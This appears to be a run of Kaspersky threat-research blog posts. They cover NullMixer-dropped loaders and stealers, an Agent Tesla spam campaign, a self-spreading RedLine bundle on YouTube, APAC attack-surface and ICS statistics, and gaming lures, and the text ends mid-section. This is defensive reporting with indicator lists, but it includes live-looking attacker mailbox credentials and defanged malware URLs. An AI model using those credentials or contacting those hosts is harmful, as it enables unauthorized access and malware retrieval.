The original file is an NSIS installer that tries to install PUA: Lightening Media Player. The file is downloaded by CsdiMonetize’s updater component (MD5: 98f0556a846f223352da516af66fa1a0). However, the installation script is configured not only to set up Lightening Media Player, but also to run the built-in Windows utility ‘bitsadmin’ to download additional files, which is why we call it Bitser. In our case, the utility was used inside the installation script of the NSIS installer, and used to download a 7z password-protected archive. The password for the 7z archive and instructions for unpacking and execution are also hardcoded into the installation script.

Downloader.Bitser’s infection chain

A legitimate 7-Zip Standalone Console application is dropped by the installer under the name ‘data_load.exe‘ and launched with arguments to unpack files from the downloaded archive.

Part of NSIS script with download and execute instructions

C-Joker

C-Joker is an incredibly simple Exodus wallet stealer. It uses the Telegram API to send notifications about successful or failed installations. In order to steal credentials, it downloads a backdoored version of the ‘app.asar’ file and replaces the original file from the Exodus wallet.

String in C-Joker’s binary

PrivateLoader

PrivateLoader is yet another example of a Pay-Per-Install malicious loader like LgoogLoader and SmokeLoader. It uses a single-byte XOR encryption key to receive URLs from the control center.

Satacom

Satacom is also known as LegionLoader. Discovered in 2019, Satacom uses different anti-analysis tricks that were probably borrowed from the al-khazer stress tool. The embedded user agent varies from sample to sample, but in our case the user agent is “deus vult”.

Strings in Satacom binary

The latest version receives the main control center address from TXT-record. Satacom sends a DNS TXT-query to ‘reosio.com‘ and receives a response with a base64 encoded string.

Satacom DNS request and response

After decoding and decrypting with the XOR key “DARKMATTER” it gets the real C&C URL ‘banhamm.com‘.

Satacom C&C communication

GCleaner

GCleaner is another Pay-Per-Install malicious loader. It was discovered at the beginning of 2019. Initially it was distributed as a cleaning tool called Garbage Cleaner or G-Cleaner through a fake website mimicking popular cleaning tools like CCleaner. The main loader was used to download potentially unwanted applications together with malware such as Azorult, Vidar, PredatorTheThief, miners and so on. GCleaner is now distributed by various crack websites along with other malware. This PPI platform uses C&C-based geolocation targeting, meaning it can push different malware depending on the victim’s IP address. Although the GCleaner loader is no longer mimicking cleaning tools, there are some still remnants of this in its binary code such as encrypted strings like “Software\GCleaner\Started” or “\Garbage.Cleaner”. The sample of GCleaner that we detected when analyzing this campaign was trying to download the Vidar password stealer.

Vidar

Vidar is an info-stealer. It downloads DLL files freebl3.dll, mozglue.dll, msvcp140.dll, nss3.dll, softokn3.dll and vcruntime140.dll from its C&C for use in password-grabbing routines. Vidar can also receive settings from the C&C that tells it exactly what to do. It is able to steal autofill information from web browsers, cookies, saved credit cards, browser history, coin wallets and Telegram databases. It also can make and send screenshots to the C&C, as well as any file that matches a specified mask.

Vidar downloads DLL files and uploads collected data

Victims

Since the beginning of the year we’ve blocked attempts to infect more than 47,778 victims worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the United States.

Attribution

We are currently unable to directly attribute NullMixer to any group.

Conclusions

Trying to save money by using unlicensed software can be costly. A single file downloaded from an unreliable source can lead to a large-scale infection of a computer system. As we can see, a large proportion of the malware families dropped by NullMixer are classified as Trojan-Downloaders, which suggests infections will not be limited to the malware families described in this report. Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.

Appendix I – Indicators of Compromise

Malicious ULRs
hxxps://azilominehostz.xyz/
hxxps://patchlinks.com/
hxxp://137.184.159.42/
hxxp://185.186.142.166/wallet.exe
hxxps://dll1.stdcdn.com/
hxxp://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
hxxp://eurekabike.com/pmzero/design/img/LightCleaner9252839.exe
hxxps://i.xyzgamei.com/gamexyz/2201/random.exe
hxxp://www.sxhxrj.com/askhelp35/askinstall35.exe
hxxps://presstheme.me/
hxxp://remviagra.com/pub1.exe
hxxp://privacy-tools-for-you-782.com/downloads/toolspab2.exe
hxxps://cdn.discordapp.com/attachments/917889480646590537/935966171835031612/Cube_WW6.exe
hxxp://onlinehueplet.com/77_1.exe
hxxps://cdn.discordapp.com/attachments/934006169125679147/943432754161410108/WW19.exe
hxxp://privacy-tools-for-you-791.com/downloads/toolspab1.exe
hxxps://cdn.discordapp.com/attachments/917889480646590537/943130993404018709/Fixtools.exe
hxxp://stylesheet.faseaegasdfase.com/hp8/g1/rtst1051.exe
hxxp://104.168.215.231/kde.exe
hxxp://careerguide4u.online/wp-content/plugins/google-analytics-for-wordpress/BlackCleanerSetp521234.exe
hxxps://i.xyzgamei.com/gamexyz/2203/random.exe
hххp://zenitsu.s3.pl-waw.scw.cloud/pub-summoning/poweroff.exe
hххps://tengenuzui.s3.pl-waw.scw.cloud/makio/cpm_pr_vp46up4d6j_.exe
hххps://tengenuzui.s3.pl-waw.scw.cloud/makio/updto_bgn64wau5x_date.exe
hххps://tengenuzui.s3.pl-waw.scw.cloud/makio/handler_wbba4vzm89rxskhs.exe
hxxps://i.xyzgamei.com/gamexyz/25/random.exe
hххps://v.xyzgamev.com/25.html
hххps://v.xyzgamev.com/login.html
hxxp://jackytpload.su/campaign6/autosubplayer.exe
hxxps://gc-distribution.biz/pub.php?pub=five
hxxp://www.sxhxrj.com/askhelp42/askinstall42.exe
hxxps://flexnetinformatica.com.br/wp-content/plugins/elementor/assets/LightCleaner2132113.exe
hxxp://stylesheet.faseaegasdfase.com\/hp8/g1/siww1053.exe
hxxps://source3.boys4dayz.com/installer.exe
hxxps://signaturebusinesspark.com/360/fw3.exe
hxxps://signaturebusinesspark.com/360/fw4.exe
hxxps://signaturebusinesspark.com/360/fw6.exe
hxxps://cdn.discordapp.com/attachments/937783814208491553/937784072967692368/SecondFile.exe
hххps://v.xyzgamev.com/23.html
hххps://v.xyzgamev.com/login.html

Malware C&Cs
178.62.113[.]205/runtermo
185.163.204[.]22/runtermo
185.163.45[.]70/runtermo
185.186.142[.]166
185.215.113[.]10
185.38.142[.]132
212.193.30[.]21/base/api/
212.193.30[.]45/proxies.txt
5.9.224[.]217
92.255.57[.]115
ads-memory[.]biz
all-mobile-pa1ments.com[.]mx
all-smart-green[.]com
am1420wbec[.]com/upload/
appwebstat[.]biz
banhamm[.]com
buy-fantasy-fo0tball.com[.]sg
buy-fantasy-gmes.com[.]sg
connectini[.]net
dll1.stdcdn[.]com
dollybuster[.]at/upload/
egsagl[.]com/upload/
enter-me[.]xyz
fennsports[.]com/upload/
file-coin-host-12[.]com
ginta[.]link
hhiuew33[.]com/check/safe
host-data-coin-11[.]com
islamic-city[.]com/upload/
mordo[.]ru/upload/
nahbleiben[.]at/upload/
noblecreativeaz[.]com/upload/
one-wedding-film[.]com
piratia-life[.]ru/upload/
presstheme[.]me
real-enter-solutions[.]xyz
recmaster[.]ru/upload/
remik-franchise[.]ru/upload/
reoseio[.]com
signaturebusinesspark[.]com
sovels[.]ru/upload/
spaldingcompanies[.]com/upload/
toa.mygametoa[.]com
topexpertshop[.]com
topniemannpicksh0p[.]cc
tvqaq[.]cn/upload/
whsddzs[.]com/Home/Index/djksye

ColdStealer hashes
06B31367D65A411B1F2A7B3091FB31D4
584B186152A16161E502816BF990747C
C41A85123AF144790520F502FE190110

CsdiMonetize hashes
5B14369C347439BECACAA0883C07F17B
7E58613DDB2FDD10EED17BBCE5B3E0A9
883403C940B477CEE083EFEEA8C252C6
98F0556A846F223352DA516AF66FA1A0
CEADA3798FD16FAC13F053D0C6F4D198

DanaBot hashes
D91325640F392D33409B8F1B2315B97C

Disbuk hashes
3739256794EBF9BA8C6597A4687C8799
FBD3940D1AD28166D8539EAE23D44D5B

Downloader.Bitser hashes
AAEFF1F8E7BD3A81C69C472BCD211A7B

Downloader.INNO hashes
E65BF2D56FCAA18C1A8D0D481072DC62

Fabookie hashes
33F7383C2EB9B20E11E6A149AA62DEA4
79400B1FD740D9CB7EC7C2C2E9A7D618

FormatLoader hashes
B8ECEC542A07067A193637269973C2E8

GCleaner hashes
42100BAF34C4B1B0E89F1C2EF94CF8F8

Generic.ClipBanker hashes
4D75DEA49F6BD60F725FAE9C28CD0960

LgoogLoader hashes
CC722FD0BD387CF472350DC2DD7DDD1E
4008D7F17A08EFD3FBD18E4E1BA29E00
B2A2F85B4201446B23A250F68051B4DC

NullMixer hashes
4EC312D77817D8FB90403FF87B88D5E3
12DBC75B071077042C097AFD59B2137F
F94BF1734F34665A65A835CC04A4AD95

PrivateLoader hashes
362592241E15293C68D0F24468723BBB
7875AAB3E23F885DF12FF62D9EF5DB50

PseudoManuscrypt hashes
B0448525C5A00135BB5B658CC6745574
D5C1C44D19D8D6E8C0F739CAB439E45E

Racealer hashes
4FEBA8683DAA18545E9F9408E4CD07BD

RedLine hashes
446119332738133D3ECD2D00EBE5D0EC
5994DE41D8B4ED3BBB4F870A33CB839A
9F8800BF866E944EFB2034EC56ED574E
AC458CABFED224353545707DF966A2BA
AF817AAD791628143019FFDE530D0EF7

Satacom hashes
2086E25FB651F0A8D713024DE2168B9B

SgnitLoader hashes
B2620FFE40493FDF9E771BFF3BDCBC44
4DD3F638D4C370ABEB3EBF59CAD8ED2F

ShortLoader hashes
CE54B9287C3E4B5733035D0BE085D989

SmokeLoader hashes
9F1EAA0FF990913F7D4DFD31841DE47A

Vidar hashes
639DE55E338BFCEA8DAAE727141AF3D1

2022. szeptember 23.

Mass email campaign with a pinch of targeted spam

Most mass malicious mailing campaigns are very primitive and hardly diverse, with the content limited to several sentences offering the user to download archives that supposedly contain some urgent bills or unpaid fines. The email messages may contain no signatures or logos, with typos and other errors being fairly common. These mailings may target individual users or large corporations, with no significant differences in message content.

Example of a mass malicious mailing message

Things have started to change recently, though, as spammers began employing techniques that are typical of targeted attacks. In particular, they have been sending emails in the name of real companies, copying the senders’ writing style and signatures.

Customer email with an Easter egg inside

We discovered a noteworthy email message recently. In it, someone posing as a Malaysian prospect and using a fairly odd variety of English, asks the recipient to review some customer requirements and get back with the requested documents. The general format complies with the corporate correspondence standards: there is a logo that belongs to a real company and a signature that features sender details. Overall, the request looks legit, while the linguistic errors easily can be attributed to the sender being a non-native speaker.

The email from the “Malaysian prospect,” with a malicious attachment

The only thing about the email that smells fishy is the sender’s address (newsletter@trade***.com), as “newsletter” is typically used for news, not procurement. Besides, the sender’s domain name is different from the company name in the logo.

In another email, a purported Bulgarian customer inquires about the availability of some products and offers to discuss the details of a deal. The requested products list is said to be in the attachment, as in the previous specimen. The sender’s address, similarly suspicious, belongs to a Greek, not Bulgarian, domain, which apparently has no relation to the company whose name is used by the spammers.

The email from the “Bulgarian customer,” with a malicious attachment

What these two messages have in common is both the mailing scenario and the fact that neither looks generated by a machine. Looking closely at the message headers, we noticed that they shared a structure: a sequence of headers, MSGID format and email client were the same. Besides, the messages originated within a limited range of IP addresses. This suggested that they were part of one massive email campaign.

Comparing the message headers of two malicious emails

Unlike the IP addresses and headers, the content varies. The spammers have been sending malicious archives addressed from a large number of companies, with the “request” text changing as well. This suggests that the operators invested quite some effort into preparations, which is uncharacteristic of this kind of campaigns.

Statistics

From April till August, our systems detected 739,749 messages attributed to the campaign. The email activity peaked in June, with 194,100 detected messages, dropping to 178,510 in July and to 104,991 in August.

Malicious email dynamics, April through August 2022 (download)

Payload: Agent Tesla malware

We studied the contents of the archives attached to the emails, finding it to contain one of two unique files that belong to the same family. It is the widespread Agent Tesla malware, written in .NET and known since 2014. Its main objective is to fetch passwords stored in browsers and other applications, and forward these to the operator. While Agent Tesla most frequently forwards data via email, there are versions that drop the stolen data into a Telegram secret chat, on a website operated by the attackers or on an FTP server. The Agent Tesla version being spread by the campaign at hand is one the latest, capable of ripping password from the following applications.

  • Browsers: Chrome, Edge, Firefox, Opera, 360 Browser, 7Star, Amigo, Brave, CentBrowser, Chedot, Chromium, Citrio, Cốc Cốc, Comodo Dragon, CoolNovo, Coowon, Elements Browser, Epic Privacy, Iridium Browser, Kometa, Liebao Browser, Orbitum, QIP Surf, Sleipnir 6, Sputnik, Torch Browser, Uran, Vivaldi, Yandex.Browser, QQ Browser, Cyberfox, IceDragon, Pale Moon, SeaMonkey, Waterfox, IceCat, K-Meleon.
  • Email clients: Becky!, Opera Mail, Foxmail, Thunderbird, Claws, Outlook, The Bat!, eM Client, Mailbird, IncrediMail, Postbox, Pocomail
  • FTP/SCP clients: WinSCP, WS_FTP, FTPGetter, SmartFTP, FTP Navigator, Core FTP
  • Databases: MySQL Workbench
  • Virtual network computing clients: RealVNC, TightVNC, TigerVNC, UltraVNC, Windows RDP, cFTP
  • VPN clients: NordVPN, OpenVPN
  • Instant messaging programs: Psi/Psi+, Trillian

Agenta Tesla is also capable of making screenshots, intercepting clipboard contents and logging keystrokes.

Agent Tesla attack geography

Agent Tesla targets users around the world. According to our observations, the malware’s activity from May till August 2022 was the highest in Europe, Asia and Latin America. The largest number of victims (20,941) was recorded in Mexico. It was followed by Spain, with 18,090 users’ devices registering infection attempts, and Germany, where 14,880 users were affected.

Ten most-attacked counties by number of affected users:

Countries/territory Users affected Mexico 20,941 Spain 18,090 Germany 14,880 Turkey 13,326 Russian Federation 12,739 Italy 12,480 Malaysia 10,092 Vietnam 9,760 Brazil 8,851 Portugal 8,739 Conclusion

The spam campaign we discovered is clear proof that cybercriminals can invest significant effort even in mass attacks. The email messages we studied appear to be high-quality imitations of business inquiries by real companies, only given away by the inappropriate sender addresses. In all likelihood, these emails were composed and sent out manually. That said, our systems were detecting more than a hundred thousand of these emails each month, which targeted organizations all around the world.

The payload spread by the attackers is capable of stealing login data from an imposing number of applications. The data may be offered for sale on darkweb forums or used in targeted attacks against organizations. Agent Tesla is notably a long-known stealer, detected by most cybersecurity products. It is assigned the verdict Trojan-PSW.MSIL.Agensla by Kaspersky products.

Indicators of compromise

MD5 hashes of attached archives:

ddc607bb993b94c543c63808bebf682a
862adb87b0b894d450f8914a353e3e9c
a1ae8b0d794af648908e0345204ea192
9d0364e1f625edb286b0d5541bb15357
eee70de3ac0dc902b99ed33408e646c9

MD5 hashes of the executables and details of attackers’ email accounts used for sending and receiving data stolen by the sample:

64011a7871abb873c822b8b99082e8ab
Mail from: info(a)essentialapparatus.co.ke
Password: Info@2018
Mail to: sales1.nuozhongsteel(a)gmail.com
Mail server: mail.essentialapparatus.co.ke:587

b012cb8cfee0062632817d12d43f98b4
Mail from: quality(a)keeprojects.in
Password: quality#@!
Mail to: quality(a)keeprojects.in
Mail server: mail.keeprojects.in:587

2022. szeptember 19.

External attack surface and ongoing cybercriminal activity in APAC region

To prevent a cyberattack, it is vital to know what the attack surface for your organization is. To be prepared to repel the attacks of cybercriminals, businesses around the world collect threat intelligence themselves or subscribe for threat intelligence services.

Continuous threat research enables Kaspersky to discover, infiltrate and monitor resources frequented by adversaries and cybercriminals worldwide. Kaspersky Digital Footprint Intelligence leverages this access to proactively detect threats targeted at organizations worldwide, their assets or brands, and alert our customers to them.

In our public reports, we provide overview of threats for different industries and regions based on the anonymized data collected by Kaspersky Digital Footprint Intelligence. Last time, we shared insights on the external attack surface for businesses and government organizations in the Middle East. This report focuses on Asia Pacific, Australia and China. We analyzed data on external threats and criminal activities affecting more than 4,700 organizations in 15 countries and territories across this region.

Main findings
  • Kaspersky Digital Footprint Intelligence found 103,058 exposed network services with unpatched software. Government institutions’ network resources were the most affected by known vulnerabilities.
  • More than one in ten encountered vulnerabilities in the external perimeters of organizations were ProxyLogon. In Japan, this vulnerability was found in 43% of all unpatched services.
  • 16,003 remote access and management services were available for attackers. Government institutions were the most affected ones.
  • On the Darknet, hackers prefer to buy and sell accesses to organizations from Australia, mainland China, India and Japan.
  • Australia, mainland China, India and Singapore comprise 84% of all data leak sell orders placed on Darknet forums.

You can find more information about the external attack surface for organizations in APAC region, as well as data sold and searched for in the dark web, in the full version of our report.

2022. szeptember 15.

Self-spreading stealer attacks gamers via YouTube

An unusual malicious bundle (a collection of malicious programs distributed in the form of a single installation file, self-extracting archive or other file with installer-type functionality) recently caught our eye. Its main payload is the widespread RedLine stealer. Discovered in March 2020, RedLine is currently one of the most common Trojans used to steal passwords and credentials from browsers, FTP clients and desktop messengers. It is openly available on underground hacker forums for just a few hundred dollars, a relatively small price tag for malware.

The stealer can pinch usernames, passwords, cookies, bank card details and autofill data from Chromium- and Gecko-based browsers, data from cryptowallets, instant messengers and FTP/SSH/VPN clients, as well as files with particular extensions from devices. In addition, RedLine can download and run third-party programs, execute commands in cmd.exe and open links in the default browser. The stealer spreads in various ways, including through malicious spam e-mails and third-party loaders.

The bundle: what’s inside beside RedLine

In addition to the payload itself, the discovered bundle is of note for its self-propagation functionality. Several files are responsible for this, which receive videos, and post them to the infected users’ YouTube channels along with the links to a password-protected archive with the bundle in the description. The videos advertise cheats and cracks and provide instructions on hacking popular games and software. Among the games mentioned are APB Reloaded, CrossFire, DayZ, Dying Light 2, F1® 22, Farming Simulator, Farthest Frontier, FIFA 22, Final Fantasy XIV, Forza, Lego Star Wars, Osu!, Point Blank, Project Zomboid, Rust, Sniper Elite, Spider-Man, Stray, Thymesia, VRChat and Walken.

Examples of videos spreading the bundle

The original bundle is a self-extracting RAR archive containing a number of malicious files, clean utilities and a script to automatically run the unpacked contents. Because of the expletives used by the bundle’s creators, we had to hide some file names.

Contents of the self-extracting archive

Right after unpacking, three executable files are run: cool.exe, ***.exe and AutoRun.exe. The first is the RedLine stealer mentioned above. The second is a miner, which makes sense, since the main target audience, judging by the video, is gamers — who are likely to have video cards installed that can be used for mining. The third executable file copies itself to the %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup directory, which ensures automatic startup and runs the first of the batch files.

The batch files, in turn, run three other malicious files: MakiseKurisu.exe, download.exe and upload.exe. These are the files responsible for the bundle’s self-distribution. On top of that, one of the batch files runs the nir.exe utility, which lets malicious executable files run without displaying any windows or taskbar icons.

Contents of the first and second batch files

The size of the download.exe file is an impressive 35 MB. However, it’s basically a regular loader whose purpose is to download videos for uploading to YouTube, as well as files with the description text and links to the malicious archive. The executable file is large because it is a NodeJS interpreter glued together with the scripts and dependencies of the main application. The malware takes the file download links from a GitHub repository. In the latest modifications, a 7-Zip archive with videos and descriptions organized into directories is downloaded. The archive is unpacked using the console version of 7-Zip, included in the bundle.

Contents of the 7-Zip archive

MakiseKurisu.exe is a password stealer written in C# and modified to suit the needs of the bundle’s creators. The source code from GitHub was likely taken as the basis: the file contains many standard stealer features that are not used in any way. These include checking for a debugger and for a virtual environment, sending information about the infected system to instant messengers, and stealing passwords.

So, what remains and what do the changes amount to? The only working function in MakiseKurisu.exe is extracting cookies from browsers and storing them in a separate file without sending the stolen data anywhere. It is precisely through cookies that the bundle gains access to the infected user’s YouTube account, where it uploads the video.

The last malicious file in the bundle is upload.exe, which uploads the video previously downloaded using download.exe, to YouTube. This file is also written in NodeJS. It uses the Puppeteer Node library, which provides a high-level API for managing Chrome and Microsoft Edge using the DevTools protocol. When the video is successfully uploaded to YouTube, upload.exe sends a message to Discord with a link to the uploaded video.

Code for video uploading

Code for sending notification to Discord

Conclusion

Cybercriminals actively hunt for gaming accounts and gaming computer resources. As we noted in our overview of gaming-related cyberthreats, stealer-type malware is often distributed under the guise of game hacks, cheats and cracks. The self-spreading bundle with RedLine is a prime example of this: cybercriminals lure victims with ads for cracks and cheats, as well as instructions on how to hack games. At the same time, the self-propagation functionality is implemented using relatively unsophisticated software, such as a customized open-source stealer. All this is further proof, if any were needed, that illegal software should be treated with extreme caution.

IoC

Links to archives with the original bundle
hxxps://telegra[.]ph/2022-July-07-27
hxxps://telegra[.]ph/DayZ-Eazy-Menu-06-24
hxxps://telegra[.]ph/Cossfire-cheat-06-24
hxxps://telegra[.]ph/APB-Reloaded-hack-05-29
hxxps://telegra[.]ph/Forza-Horizon-5-Hack-Menu-07-13
hxxps://telegra[.]ph/Point-Blank-Cheat-05-29
hxxps://telegra[.]ph/Project-Zomboid-Private-Cheat-06-26
hxxps://telegra[.]ph/VRChat-Cheat-04-24

Links to GitHub
hxxps://github[.]com/AbdulYaDada/fdgkjhfdguoerldifgj
hxxps://raw.githubusercontent[.]com/AbdulYaDada/fdgkjhfdguoerldifgj/

RedLine C2
45.150.108[.]67:80

2022. szeptember 8.

Threat landscape for industrial automation systems for H1 2022

H1 2022 in numbers Geography
  • In H1 2022, malicious objects were blocked at least once on 31.8% of ICS computers globally.

    Percentage of ICS computers on which malicious objects were blocked

  • For the first time in five years of observations, the lowest percentage in the ‎first half of the year was observed in March.‎ During the period from January to March, the percentage of attacked ICS computers decreased by 1.7 p.p.

    Percentage of ICS computers on which malicious objects were blocked, January – June 2020, 2021, and 2022

  • Among regions, the highest percentage of ICS computers on which malicious objects were blocked was observed in Africa (41.5%). The lowest percentage (12.8%) was recorded in Northern Europe.

    Percentage of ICS computers on which malicious objects were blocked, in global regions

  • Among countries, the highest percentage of ICS computers on which malicious objects were blocked was recorded in Ethiopia (54.8%) and the lowest (6.8%) in Luxembourg.

    15 countries and territories with the highest percentage of ICS computers on which malicious objects were blocked, H1 2022

    10 countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked, H1 2022

Threat sources
  • The main sources of threats to computers in the operational technology infrastructure of organizations are internet (16.5%), removable media (3.5%), and email (7.0%).

    Percentage of ICS computers on which malicious objects from different sources were blocked

Regions
  • Among global regions, Africa ranked highest based on the percentage of ICS computers on which malware was blocked when removable media was connected.

    Regions ranked by percentage of ICS computers on which malware was blocked when removable media was connected, H1 2022

  • Southern Europe leads the ranking of regions by percentage of ICS computers on which malicious email attachments and phishing links were blocked.

    Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H1 2022

Industry specifics
  • In the Building Automation industry, the percentage of ICS computers on which malicious email attachments and phishing links were blocked (14.4%) was twice the average value for the entire world (7%).

    Percentage of ICS computers on which malicious email attachments and phishing links were blocked, in selected industries

  • In the Oil and Gas industry, the percentage of ICS computers on which threats were blocked when removable media was connected (10.4%) was 3 times the average percentage for the entire world (3.5%).

    Percentage of ICS computers on which threats were blocked when removable media was connected

  • In the Oil and Gas industry, the percentage of ICS computers on which malware was blocked in network folders (1.2%) was twice the world average (0.6%).

    Percentage of ICS computers on which threats were blocked in network folders

Diversity of malware
  • Malware of different types from 7,219 families was blocked on ICS computers in H1 2022.

    Percentage of ICS computers on which the activity of malicious objects from different categories was prevented

Ransomware
  • In H1 2022, ransomware was blocked on 0.65% of ICS computers. This is the highest percentage for any six-month reporting period since 2020.

    Percentage of ICS computers on which ransomware was blocked

  • The highest percentage of ICS computers on which ransomware was blocked was recorded in February (0.27%) and the lowest in March (0.11%). The percentage observed in February was the highest in 2.5 years of observations.

    Percentage of ICS computers on which ransomware was blocked, January – June 2022

  • East Asia (0.95%) and the Middle East (0.89%) lead the ransomware-based ranking of regions. In the Middle East, the percentage of ICS computers on which ransomware was blocked per six-month reporting period has increased by a factor of 2.5 since 2020.

    Regions ranked by percentage of ICS computers on which ransomware was blocked, H1 2022

  • Building Automation leads the ranking of industries based on the percentage of ICS computers attacked by ransomware (1%).

    Percentage of ICS computers on which ransomware was blocked, in selected regions, H1 2022

Malicious documents
  • Malicious documents (MSOffice+PDF) were blocked on 5.5% of ICS computers. This is 2.2 times the percentage recorded in H2 2021. Threat actors distribute malicious documents via phishing emails and actively use such emails as the vector of initial computer infections.

    Percentage of ICS computers on which malicious documents (MSOffice+PDF) were blocked

  • In the Building Automation industry, the percentage of ICS computers on which malicious office documents were blocked (10.5%) is almost twice the global average.

    Percentage of ICS computers on which malicious office documents (MSOffice+PDF) were blocked, in selected industries

Spyware
  • Spyware was blocked on 6% of ICS computers. This percentage has been growing since 2020.

    Percentage of ICS computers on which spyware was blocked

  • Building Automation leads the ranking of industries based on the percentage of ICS computers on which spyware was blocked (12.9%).

    Percentage of ICS computers on which spyware was blocked, in selected industries

Malware for covert cryptocurrency mining
  • The percentage of ICS computers on which malicious cryptocurrency miners were blocked continued to rise gradually.

    Percentage of ICS computers on which malicious cryptocurrency miners were blocked

  • Building Automation also leads the ranking of selected industries by percentage of ICS computers on which malicious cryptocurrency miners were blocked.

    Percentage of ICS computers on which malicious cryptocurrency miners were blocked, in selected industries

The full text of the report has been published on the Kaspersky ICS CERT website.

2022. szeptember 6.

Good game, well played: an overview of gaming-related cyberthreats in 2022

The gaming industry went into full gear during the pandemic, as many people took up online gaming as their new hobby to escape the socially-distanced reality. Since then, the industry has never stopped growing. According to the analytical agency Newzoo, in 2022, the global gaming market will exceed $ 200 billion, with 3 billion players globally. Such an engaged, solvent and eager-to-win audience becomes a tidbit for cybercriminals, who always find ways to fool their victims. One of the most outstanding examples involves $2 million‘s worth of CS:GO skins stolen from a user’s account, which means that losses can get truly grave. Besides stealing personal credentials and funds, hackers can affect the performance of gaming computers, infecting these with unsolicited miner files.

In this report, we provide the latest statistics on cyberthreats to gamers, as well as detailed information on the most widespread and dangerous types of malware that players must be aware of.

Methodology

To assess the current landscape of gaming risks, we observed the most widespread PC game-related threats and statistics on miner attacks, threats masquerading as game cheats, stealers, and analyzed several most active malware families, giving them detailed in-depth characteristics. For these purposes, we analyzed threat statistics from Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users, for the period between January 2021 and June 2022.

To limit the research scope, we analyzed several lists of most popular games and based on this, created a list of TOP 28 games and game series available for download or about to be released on the streaming platforms Origin and Steam, as well as platform-independent titles. To make the overview more in-depth, we included both mobile and PC games. Thus, we analyzed threats related to the following titles:

  1. Minecraft
  2. Roblox
  3. Need for Speed
  4. Grand Theft Auto
  5. Call of Duty
  6. FIFA
  7. The Sims
  8. Far Cry
  9. CS:GO
  10. PUBG
  11. Valorant
  12. Resident Evil
  13. Command & Conquer
  14. Hitman
  15. Total War
  16. Cyberpunk 2077
  17. Elden Ring
  18. Final Fantasy
  19. Halo
  20. Legend of Zelda
  21. League of Legends
  22. Dota 2
  23. Apex Legends
  24. World of Warcraft
  25. Gears of War
  26. Tomb Raider
  27. S.T.A.L.K.E.R.
  28. Warhammer

We used the titles of the games as keywords and ran these against our KSN telemetry to determine the prevalence of malicious files and unwanted software related to these games, as well as the number of users attacked by these files. Also, we tracked the number of fake cheat programs for the popular games listed above, and an amount of miners that dramatically affect the performance of gamers’ computers.

Additionally, we looked at the phishing activity around gaming, specifically that related to cybersports tournaments, bookmakers, gaming marketplaces, and gaming platforms, and found numerous examples of scams that target gamers and esports fans.

Key findings
  • The total number of users who encountered gaming-related malware and unwanted software from July 1, 2021 through June 30, 2022 was 384,224, with 91,984 files distributed under the guise of twenty-eight games or series of games;
  • The TOP 5 PC games or game series used as bait in the attacks targeting the largest number of users from July 1, 2021 to June 30, 2022 were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty;
  • The number of malicious and unwanted files related to Minecraft dropped by 36% compared to the previous year (23,239 against 36,336), and the number of affected users decreased by almost 30% year on year (131,005 against 184,887);
  • The TOP 5 mobile games that served as a lure targeting the largest number of users from July 1, 2021 to June 30, 2022 were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA;
  • In the first half of 2022, we observed a noticeable increase in the number of users attacked by programs that can steal secrets, with a 13% increase over the first half of 2021;
  • In the first half of 2022, attackers cranked up their efforts to spread Trojan-PSW: 77% of secret-stealing malware infection cases were linked to Trojan-PSW;
  • Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers’ security, especially for those who are keen on popular game series: from July 1, 2021 to June 30, 2022 we detected 3,154 unique files of this type that affected 13,689 users;
  • Miners pose an increasing threat to gamers’ productivity, with Far Cry, Roblox, Minecraft, Valorant, and FIFA topping the list of games and game series that were used as a lure for cyberthreats; 1,367 unique files and 3,374 users who encountered these files from July 1, 2021 to June 30, 2022.
Top game titles by number of related threats

Over the course of last year, from July 2021 through June 2022, 91,984 files that included malware and potentially unwanted applications were distributed using the popular game titles as a lure, with 384,224 users encountering these threats globally.

Continuing the trend observed in 2021, Minecraft, the famous sandbox game that has been one of the most-played titles around the world for more than a decade, took first place among the games most often used as bait, with 23,239 files distributed using the Minecraft name affecting 131,005 users from July 2021 through June 2022. However, the number of malicious and unwanted files related to Minecraft dropped by 36% compared to the previous year (36,336), and the number of affected users decreased by almost 30% year on year (184,887).

Roblox, too, entered the TOP 3 games both by number of related malicious or unwanted files (8,903) and affected users (38,838).

Other titles that were most often used as a lure were FIFA, Far Cry, and Call of Duty. A large number of users encountered threats while searching for content related to Need for Speed, GTA, and Call of Duty. These game series, too, have been winning the hearts of players around the world for years.

The TOP 10 games by number of related unique malicious and unwanted files:

Name Number of unique files* Minecraft 23239 FIFA 10776 Roblox 8903 Far Cry 8736 Call of Duty 8319 Need for Speed 7569 Grand Theft Auto 7125 Valorant 5426 The Sims 5005 CS:GO 4790

* Total number of detected files using game title, from July 1, 2021 to June, 30 2022

The TOP 10 games by number of unique users attacked using the game as a lure:

Name Number of users* Minecraft 131005 Roblox 38838 Need for Speed 32314 Grand Theft Auto 31752 Call of Duty 30401 FIFA 26832 The Sims 26319 Far Cry 18530 CS:GO 18031 PUBG 9553

Number of unique users affected by threats related to the game, from July 1, 2021 to June, 30 2022

As the mobile gaming market continues to grow, we analyzed KSN data specifically on mobile threats. For the period from July 1, 2021 through June 30, 2022, our telemetry shows that 31,581 mobile users were exposed to game-related malware and potentially unwanted software. The number of unique malicious and unwanted files discovered within the given period is 5,976. Minecraft, Roblox, Grand Theft Auto, PUBG, and FIFA are among the games that ranked highest by number of related threats and affected users.

Name Number of unique users Minecraft 26270 Roblox 1186 Grand Theft Auto 927 PUBG 666 FIFA 619

TOP 5 mobile games used as a lure for distribution of malware and unwanted software, by users, from July 1, 2021 through June, 30 2022

Name Number of unique files Minecraft 2406 Grand Theft Auto 948 PUBG 624 Roblox 612 FIFA 293

TOP 5 mobile games used as a lure for distribution of malware and unwanted software, by files, from July 1, 2021 through June, 30 2022

Cyberthreats using games as a lure

